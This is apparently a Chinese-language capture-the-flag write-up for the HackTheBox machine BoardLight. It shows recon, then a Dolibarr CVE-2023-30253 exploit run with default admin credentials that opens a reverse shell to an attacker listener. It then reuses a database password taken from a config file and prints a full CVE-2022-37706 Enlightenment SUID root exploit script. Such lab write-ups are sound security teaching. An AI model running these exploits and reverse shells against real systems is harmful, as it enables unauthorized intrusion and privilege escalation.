BoardLight
BoardLight 是一个easy难度的靶机,在初始80网站中能够获取到其域名
board.htb,然后fuzz获取到子域名crm.board.htb,在这个子域名上部署了一个Dolibarr ERP系统,它存在一个RCE漏洞 CVE-2023-30253,然后可以从网站配置文件中获取到mysql的密码,其密码被 larissa用户复用,发现一个与enlightenment相关的SUID二进制文件,该文件存在 CVE-2022-37706 提权漏洞,可被利用来获取 root shell。
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# nmap 10.129.9.143 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-19 08:39 EST
Nmap scan report for 10.129.9.143
Host is up (0.073s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 10.97 seconds
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# nmap 10.129.9.143 -p 22,80 -sCV -O
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-19 08:39 EST
Nmap scan report for 10.129.9.143
Host is up (0.068s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.21 seconds
1.1.2. vhost
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://boardlight.htb/ -H "Host: FUZZ.boardlight.htb" -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://boardlight.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.boardlight.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [4989/4989] :: Job [1/1] :: 339 req/sec :: Duration: [0:00:11] :: Errors: 0 ::
1.1.3. dirsearch
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# dirsearch -u boardlight.htb -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/BoardLight/reports/_boardlight.htb/_25-12-19_08-42-44.txt
Target: http://boardlight.htb/
[08:42:45] Starting:
[08:42:46] 301 - 313B - /js -> http://boardlight.htb/js/
[08:42:52] 200 - 2KB - /about.php
[08:43:03] 200 - 2KB - /contact.php
[08:43:03] 301 - 314B - /css -> http://boardlight.htb/css/
[08:43:08] 301 - 317B - /images -> http://boardlight.htb/images/
Task Completed
1.2. web
有一个联系表单。填写后直接就回到滚动到顶部了。这就是一个静态的
1.2.1. portfolio.php
在源代码中可以找到一个注释,里面包含了一个Php文件 portfolio.php
用 arjun 爆破一下参数
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# arjun -u http://boardlight.htb/portfolio.php
_
/_| _ '
( |/ /(//) v2.2.7
_/
[*] Scanning 0/1: http://boardlight.htb/portfolio.php
[*] Probing the target for stability
[*] Analysing HTTP response for anomalies
[*] Logicforcing the URL endpoint
[!] No parameters were discovered.
没有爆破成功
1.2.2. Domain
在底部我发现域名并不是 boardlight.htb 而是 board.htb
修改一下域名重新子域名爆破
1.2.3. vhost brute
这里用 ffuf
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# sed -i 's/boardlight/board/' /etc/hosts
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://10.129.9.143 -H "Host: FUZZ.board.htb" -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.9.143
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.board.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 601ms]
:: Progress: [19966/19966] :: Job [1/1] :: 547 req/sec :: Duration: [0:00:43] :: Errors: 0 ::
发现子域名 crm.board.htb
1.2.4. dirsearch for crm.board.htb
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# dirsearch -u crm.board.htb -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/BoardLight/reports/_crm.board.htb/_25-12-19_09-06-41.txt
Target: http://crm.board.htb/
[09:06:41] Starting:
[09:06:49] 301 - 314B - /admin -> http://crm.board.htb/admin/
[09:06:55] 301 - 312B - /api -> http://crm.board.htb/api/
[09:06:55] 200 - 108B - /api/
[09:06:58] 301 - 319B - /categories -> http://crm.board.htb/categories/
[09:07:00] 301 - 316B - /contact -> http://crm.board.htb/contact/
[09:07:00] 301 - 313B - /core -> http://crm.board.htb/core/
[09:07:00] 301 - 313B - /cron -> http://crm.board.htb/cron/
[09:07:03] 200 - 2KB - /favicon.ico
[09:07:04] 301 - 312B - /ftp -> http://crm.board.htb/ftp/
[09:07:06] 301 - 317B - /includes -> http://crm.board.htb/includes/
[09:07:07] 301 - 316B - /install -> http://crm.board.htb/install/
[09:07:07] 200 - 322B - /install/
[09:07:07] 200 - 322B - /install/index.php?upgrade/
[09:07:16] 301 - 316B - /product -> http://crm.board.htb/product/
[09:07:17] 301 - 315B - /public -> http://crm.board.htb/public/
[09:07:17] 302 - 0B - /public/ -> /public/error-404.php
[09:07:17] 301 - 317B - /resource -> http://crm.board.htb/resource/
[09:07:18] 200 - 105B - /robots.txt
[09:07:18] 200 - 176B - /security.txt
[09:07:21] 301 - 316B - /support -> http://crm.board.htb/support/
[09:07:21] 200 - 1KB - /support/
[09:07:23] 301 - 314B - /theme -> http://crm.board.htb/theme/
[09:07:24] 301 - 313B - /user -> http://crm.board.htb/user/
[09:07:24] 301 - 319B - /user/admin -> http://crm.board.htb/user/admin/
[09:07:27] 301 - 316B - /website -> http://crm.board.htb/website/
Task Completed
security.txt:
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# curl http://crm.board.htb/security.txt
# Security policies of Dolibarr ERP CRM project
Contact: mailto:security@dolibarr.org
Preferred-Languages: en
Policy: https://github.com/Dolibarr/dolibarr/security/policy
Expires: Sat, 31 Dec 2050 00:00:00 GMT
robots.txt
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# curl http://crm.board.htb//robots.txt
User-agent: *
Allow: /public/agenda/agendaexport.php
Allow: /public/demo/
Allow: /public/members/new.php
Allow: /index.php
#Allow: /$
Disallow: /
1.3. CVE-2023-30253 Dolibarr RCE
CVE-2023-30253 Dolibarr RCE
http://crm.board.htb/
这里是一个 Dolibarr 17.0.0 ERP
但这是一个后台RCE,得先获取到账号密码才行
这里可以通过默认账号密码 admin / admin 登录进来
进来后可以发现这是一个受限制的用户(尽管是 admin 用户)
但足够我们执行这个exp了
┌──(root㉿kali)-[~/Desktop/htb/BoardLight/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└─# python exploit.py http://crm.board.htb admin admin 10.10.14.74 4444
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# penelope -p 4444
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.8.18 • 172.19.0.1 • 172.17.0.1 • 10.10.14.74
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from boardlight~10.129.9.143-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/sessions/boardlight~10.129.9.143-Linux-x86_64/2025_12_19-09_27_17-237.log 📜
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ whoami
www-data
2. larissa
2.1. recon
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ ss -tunlp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:5353 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:40753 0.0.0.0:*
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
udp UNCONN 0 0 [::]:5353 [::]:*
udp UNCONN 0 0 [::]:34157 [::]:*
>>>> tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
>>>> tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 *:80 *:*
可以发现本地是有mysql的
直接grep可以找到有数据库的配置文件
www-data@boardlight:~/html/crm.board.htb/htdocs$ grep \'3306\' -r ./
./support/inc.php: $dolibarr_main_db_port = '3306'; // For backward compatibility
./install/mysql/data/llx_accounting_account_de.sql:INSERT INTO llx_accounting_account (entity, rowid, fk_pcg_version, pcg_type, account_number, account_parent, label) VALUES (__ENTITY__, 2247, 'SKR03', '3', '3306', '2240', 'Wareneingang 7% Vorsteuer');
./install/inc.php: $dolibarr_main_db_port = '3306'; // For backward compatibility
./conf/conf.php.old:// $dolibarr_main_db_host='3306';
./conf/conf.php.example:// $dolibarr_main_db_host='3306';
./conf/conf.php:$dolibarr_main_db_port='3306';
2.2. mysql
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
>>>> $dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
>>>> $dolibarr_main_db_user='dolibarrowner';
>>>> $dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ mysql -udolibarrowner -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 71
Server version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2024, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> showdatabase;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'showdatabase' at line 1
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| dolibarr |
| information_schema |
| performance_schema |
+--------------------+
3 rows in set (0.00 sec)
mysql> use dolibarr
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
showDatabase changed
mysql> show tables;
+-------------------------------------------------------------+
| Tables_in_dolibarr |
+-------------------------------------------------------------+
| llx_accounting_account |
| llx_accounting_bookkeeping |
| llx_accounting_bookkeeping_tmp |
| llx_accounting_fiscalyear |
| llx_accounting_groups_account |
| llx_accounting_journal |
| llx_accounting_system |
| llx_actioncomm |
| llx_actioncomm_extrafields |
| llx_actioncomm_reminder |
| llx_actioncomm_resources |
| llx_adherent |
| llx_adherent_extrafields |
| llx_adherent_type |
| llx_adherent_type_extrafields |
| llx_adherent_type_lang |
| llx_bank |
| llx_bank_account |
| llx_bank_account_extrafields |
| llx_bank_categ |
| llx_bank_class |
| llx_bank_extrafields |
| llx_bank_url |
| llx_blockedlog |
| llx_blockedlog_authority |
| llx_bom_bom |
| llx_bom_bom_extrafields |
| llx_bom_bomline |
| llx_bom_bomline_extrafields |
| llx_bookmark |
| llx_bordereau_cheque |
| llx_boxes |
| llx_boxes_def |
| llx_budget |
| llx_budget_lines |
| llx_c_accounting_category |
| llx_c_action_trigger |
| llx_c_actioncomm |
| llx_c_availability |
| llx_c_barcode_type |
| llx_c_chargesociales |
| llx_c_civility |
| llx_c_country |
| llx_c_currencies |
| llx_c_departements |
| llx_c_ecotaxe |
| llx_c_effectif |
| llx_c_email_senderprofile |
| llx_c_email_templates |
| llx_c_exp_tax_cat |
| llx_c_exp_tax_range |
| llx_c_field_list |
| llx_c_format_cards |
| llx_c_forme_juridique |
| llx_c_holiday_types |
| llx_c_hrm_department |
| llx_c_hrm_function |
| llx_c_hrm_public_holiday |
| llx_c_incoterms |
| llx_c_input_method |
| llx_c_input_reason |
| llx_c_lead_status |
| llx_c_paiement |
| llx_c_paper_format |
| llx_c_payment_term |
| llx_c_price_expression |
| llx_c_price_global_variable |
| llx_c_price_global_variable_updater |
| llx_c_product_nature |
| llx_c_productbatch_qcstatus |
| llx_c_propalst |
| llx_c_prospectcontactlevel |
| llx_c_prospectlevel |
| llx_c_recruitment_origin |
| llx_c_regions |
| llx_c_revenuestamp |
| llx_c_shipment_mode |
| llx_c_shipment_package_type |
| llx_c_socialnetworks |
| llx_c_stcomm |
| llx_c_stcommcontact |
| llx_c_ticket_category |
| llx_c_ticket_resolution |
| llx_c_ticket_severity |
| llx_c_ticket_type |
| llx_c_transport_mode |
| llx_c_tva |
| llx_c_type_contact |
| llx_c_type_container |
| llx_c_type_fees |
| llx_c_type_resource |
| llx_c_typent |
| llx_c_units |
| llx_c_ziptown |
| llx_categorie |
| llx_categorie_account |
| llx_categorie_actioncomm |
| llx_categorie_contact |
| llx_categorie_fournisseur |
| llx_categorie_lang |
| llx_categorie_member |
| llx_categorie_product |
| llx_categorie_project |
| llx_categorie_societe |
| llx_categorie_user |
| llx_categorie_warehouse |
| llx_categorie_website_page |
| llx_categories_extrafields |
| llx_chargesociales |
| llx_commande |
| llx_commande_extrafields |
| llx_commande_fournisseur |
| llx_commande_fournisseur_dispatch |
| llx_commande_fournisseur_dispatch_extrafields |
| llx_commande_fournisseur_extrafields |
| llx_commande_fournisseur_log |
| llx_commande_fournisseurdet |
| llx_commande_fournisseurdet_extrafields |
| llx_commandedet |
| llx_commandedet_extrafields |
| llx_comment |
| llx_const |
| llx_contrat |
| llx_contrat_extrafields |
| llx_contratdet |
| llx_contratdet_extrafields |
| llx_contratdet_log |
| llx_cronjob |
| llx_default_values |
| llx_delivery |
| llx_delivery_extrafields |
| llx_deliverydet |
| llx_deliverydet_extrafields |
| llx_document_model |
| llx_ecm_directories |
| llx_ecm_directories_extrafields |
| llx_ecm_files |
| llx_ecm_files_extrafields |
| llx_element_categorie |
| llx_element_contact |
| llx_element_element |
| llx_element_resources |
| llx_emailcollector_emailcollector |
| llx_emailcollector_emailcollectoraction |
| llx_emailcollector_emailcollectorfilter |
| llx_entrepot |
| llx_entrepot_extrafields |
| llx_establishment |
| llx_event_element |
| llx_eventorganization_conferenceorboothattendee |
| llx_eventorganization_conferenceorboothattendee_extrafields |
| llx_events |
| llx_expedition |
| llx_expedition_extrafields |
| llx_expedition_package |
| llx_expeditiondet |
| llx_expeditiondet_batch |
| llx_expeditiondet_extrafields |
| llx_expensereport |
| llx_expensereport_det |
| llx_expensereport_extrafields |
| llx_expensereport_ik |
| llx_expensereport_rules |
| llx_export_compta |
| llx_export_model |
| llx_extrafields |
| llx_facture |
| llx_facture_extrafields |
| llx_facture_fourn |
| llx_facture_fourn_det |
| llx_facture_fourn_det_extrafields |
| llx_facture_fourn_det_rec |
| llx_facture_fourn_det_rec_extrafields |
| llx_facture_fourn_extrafields |
| llx_facture_fourn_rec |
| llx_facture_fourn_rec_extrafields |
| llx_facture_rec |
| llx_facture_rec_extrafields |
| llx_facturedet |
| llx_facturedet_extrafields |
| llx_facturedet_rec |
| llx_facturedet_rec_extrafields |
| llx_fichinter |
| llx_fichinter_extrafields |
| llx_fichinter_rec |
| llx_fichinterdet |
| llx_fichinterdet_extrafields |
| llx_fichinterdet_rec |
| llx_holiday |
| llx_holiday_config |
| llx_holiday_extrafields |
| llx_holiday_logs |
| llx_holiday_users |
| llx_import_model |
| llx_inventory_extrafields |
| llx_links |
| llx_localtax |
| llx_mailing_unsubscribe |
| llx_menu |
| llx_mrp_mo |
| llx_mrp_mo_extrafields |
| llx_mrp_production |
| llx_multicurrency |
| llx_multicurrency_rate |
| llx_notify |
| llx_notify_def |
| llx_notify_def_object |
| llx_oauth_state |
| llx_oauth_token |
| llx_object_lang |
| llx_onlinesignature |
| llx_overwrite_trans |
| llx_paiement |
| llx_paiement_facture |
| llx_paiementcharge |
| llx_paiementfourn |
| llx_paiementfourn_facturefourn |
| llx_payment_donation |
| llx_payment_expensereport |
| llx_payment_loan |
| llx_payment_salary |
| llx_payment_various |
| llx_payment_vat |
| llx_pos_cash_fence |
| llx_prelevement |
| llx_prelevement_bons |
| llx_prelevement_demande |
| llx_prelevement_lignes |
| llx_prelevement_rejet |
| llx_printing |
| llx_product |
| llx_product_association |
| llx_product_attribute |
| llx_product_attribute_combination |
| llx_product_attribute_combination2val |
| llx_product_attribute_combination_price_level |
| llx_product_attribute_value |
| llx_product_batch |
| llx_product_customer_price |
| llx_product_customer_price_log |
| llx_product_extrafields |
| llx_product_fournisseur_price |
| llx_product_fournisseur_price_extrafields |
| llx_product_fournisseur_price_log |
| llx_product_lang |
| llx_product_lot |
| llx_product_lot_extrafields |
| llx_product_price |
| llx_product_price_by_qty |
| llx_product_pricerules |
| llx_product_stock |
| llx_product_warehouse_properties |
| llx_projet |
| llx_projet_extrafields |
| llx_projet_task |
| llx_projet_task_extrafields |
| llx_projet_task_time |
| llx_propal |
| llx_propal_extrafields |
| llx_propal_merge_pdf_product |
| llx_propaldet |
| llx_propaldet_extrafields |
| llx_reception |
| llx_reception_extrafields |
| llx_resource |
| llx_resource_extrafields |
| llx_rights_def |
| llx_salary |
| llx_salary_extrafields |
| llx_session |
| llx_societe |
| llx_societe_account |
| llx_societe_address |
| llx_societe_commerciaux |
| llx_societe_contacts |
| llx_societe_extrafields |
| llx_societe_prices |
| llx_societe_remise |
| llx_societe_remise_except |
| llx_societe_remise_supplier |
| llx_societe_rib |
| llx_socpeople |
| llx_socpeople_extrafields |
| llx_stock_mouvement |
| llx_stock_mouvement_extrafields |
| llx_subscription |
| llx_supplier_proposal |
| llx_supplier_proposal_extrafields |
| llx_supplier_proposaldet |
| llx_supplier_proposaldet_extrafields |
| llx_takepos_floor_tables |
| llx_tva |
| llx_user |
| llx_user_alert |
| llx_user_clicktodial |
| llx_user_employment |
| llx_user_extrafields |
| llx_user_param |
| llx_user_rib |
| llx_user_rights |
| llx_usergroup |
| llx_usergroup_extrafields |
| llx_usergroup_rights |
| llx_usergroup_user |
| llx_website |
| llx_website_extrafields |
| llx_website_page |
+-------------------------------------------------------------+
307 rows in set (0.00 sec)
mysql> select * from llx_accounting_account ;
Empty set (0.00 sec)
mysql> select * from llx_accounting_account;
Empty set (0.00 sec)
mysql> select * from llx_user ;
+-------+--------+--------------+---------+-------+----------+------------------+---------------------+---------------------+---------------+---------------+----------+---------------+------+--------------------------------------------------------------+-----------+--------------+--------+----------+------------+-----------+---------+------+------+----------+------------+-------+-------------+------+--------------+------------+-------------+-----------------+-------+----------------+-----------+----------------+--------+--------------+-----------+---------+---------------------------+---------------------------+---------+---------+---------+-------------+--------------+-----------+---------------------+---------------------+------------------------+-------------------+-----------------+-------------+-----------------+---------------+----------+--------+--------+-------+------+-------+---------+-----------------+------------------+------------+------+------+--------+-------------+----------------+-------------------+-------------+------------+---------------+-----------------------+------------------------------+--------------+
| rowid | entity | ref_employee | ref_ext | admin | employee | fk_establishment | datec | tms | fk_user_creat | fk_user_modif | login | pass_encoding | pass | pass_crypted | pass_temp | api_key | gender | civility | lastname | firstname | address | zip | town | fk_state | fk_country | birth | birth_place | job | office_phone | office_fax | user_mobile | personal_mobile | email | personal_email | signature | socialnetworks | fk_soc | fk_socpeople | fk_member | fk_user | fk_user_expense_validator | fk_user_holiday_validator | idpers1 | idpers2 | idpers3 | note_public | note_private | model_pdf | datelastlogin | datepreviouslogin | datelastpassvalidation | datestartvalidity | dateendvalidity | iplastlogin | ippreviouslogin | egroupware_id | ldap_sid | openid | statut | photo | lang | color | barcode | fk_barcode_type | accountancy_code | nb_holiday | thm | tjm | salary | salaryextra | dateemployment | dateemploymentend | weeklyhours | import_key | default_range | default_c_exp_tax_cat | national_registration_number | fk_warehouse |
+-------+--------+--------------+---------+-------+----------+------------------+---------------------+---------------------+---------------+---------------+----------+---------------+------+--------------------------------------------------------------+-----------+--------------+--------+----------+------------+-----------+---------+------+------+----------+------------+-------+-------------+------+--------------+------------+-------------+-----------------+-------+----------------+-----------+----------------+--------+--------------+-----------+---------+---------------------------+---------------------------+---------+---------+---------+-------------+--------------+-----------+---------------------+---------------------+------------------------+-------------------+-----------------+-------------+-----------------+---------------+----------+--------+--------+-------+------+-------+---------+-----------------+------------------+------------+------+------+--------+-------------+----------------+-------------------+-------------+------------+---------------+-----------------------+------------------------------+--------------+
| 1 | 0 | | NULL | 1 | 1 | 0 | 2024-05-13 13:21:56 | 2024-05-13 13:21:56 | NULL | NULL | dolibarr | NULL | NULL | $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm | NULL | NULL | | | SuperAdmin | | | | | NULL | NULL | NULL | NULL | | | | | | | | | null | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | | NULL | 2024-05-15 09:57:04 | 2024-05-13 23:23:59 | NULL | NULL | NULL | 10.10.14.31 | 10.10.14.41 | NULL | | NULL | 1 | NULL | NULL | | NULL | 0 | | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | NULL |
| 2 | 1 | | NULL | 0 | 1 | 0 | 2024-05-13 13:24:01 | 2024-05-15 09:58:40 | NULL | NULL | admin | NULL | NULL | $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96 | NULL | yr6V3pXd9QEI | NULL | | admin | | | | | NULL | NULL | NULL | NULL | | | | | | | | | [] | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | | NULL | 2025-12-19 06:27:07 | 2025-12-19 06:24:29 | NULL | NULL | NULL | 10.10.14.74 | 10.10.14.74 | NULL | | NULL | 1 | NULL | NULL | | NULL | 0 | | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | NULL |
+-------+--------+--------------+---------+-------+----------+------------------+---------------------+---------------------+---------------+---------------+----------+---------------+------+--------------------------------------------------------------+-----------+--------------+--------+----------+------------+-----------+---------+------+------+----------+------------+-------+-------------+------+--------------+------------+-------------+-----------------+-------+----------------+-----------+----------------+--------+--------------+-----------+---------+---------------------------+---------------------------+---------+---------+---------+-------------+--------------+-----------+---------------------+---------------------+------------------------+-------------------+-----------------+-------------+-----------------+---------------+----------+--------+--------+-------+------+-------+---------+-----------------+------------------+------------+------+------+--------+-------------+----------------+-------------------+-------------+------------+---------------+-----------------------+------------------------------+--------------+
2 rows in set (0.01 sec)
mysql>
这是一个10轮的bcrypt哈希,我感觉是爆破不出来的,
先试试看这个数据库密码能不能够复用
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ su larissa
Password:
larissa@boardlight:/var/www/html/crm.board.htb/htdocs/conf$ whoami
larissa
3. Root
看一下提权信息
larissa@boardlight:~$ sudo -l
[sudo] password for larissa:
Sorry, user larissa may not run sudo on localhost.
用 linPEAS 跑一下
这是24年的机器,应该不会有这个21年的洞。
3.1. enlightenment CVE-2022-37706-LPE
enlightenment CVE-2022-37706-LPE
看一下SUID
larissa@boardlight:~$ find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
发现有一个 enlightenment,搜索即可发现存在一个CVE CVE-2022-37706
[[exp: [Enlightenment v0.25.3 - Privilege escalation - Linux local Exploit](https://www.exploit-db.com/exploits/51180)](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit)](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit)
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# git clone https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit
Cloning into 'CVE-2022-37706-LPE-exploit'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (92/92), done.
remote: Compressing objects: 100% (92/92), done.
remote: Total 92 (delta 32), reused 14 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (92/92), 498.76 KiB | 257.00 KiB/s, done.
Resolving deltas: 100% (32/32), done.
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# cd CVE-2022-37706-LPE-exploit
┌──(root㉿kali)-[~/Desktop/htb/BoardLight/CVE-2022-37706-LPE-exploit]
└─# ls
exploit.sh PublicReferenceURL.txt README.md screenshots
┌──(root㉿kali)-[~/Desktop/htb/BoardLight/CVE-2022-37706-LPE-exploit]
└─# cat exploit.sh
#!/bin/bash
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
larissa@boardlight:~$ bash exp.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# whoami
root
# ls /root
root.txt snap
# cat /root/root.txt
d05f6b6990676adcdcd16e393881ca11
4. Beyond Root
4.1. 为什么www-date不能执行CVE-2022-37706
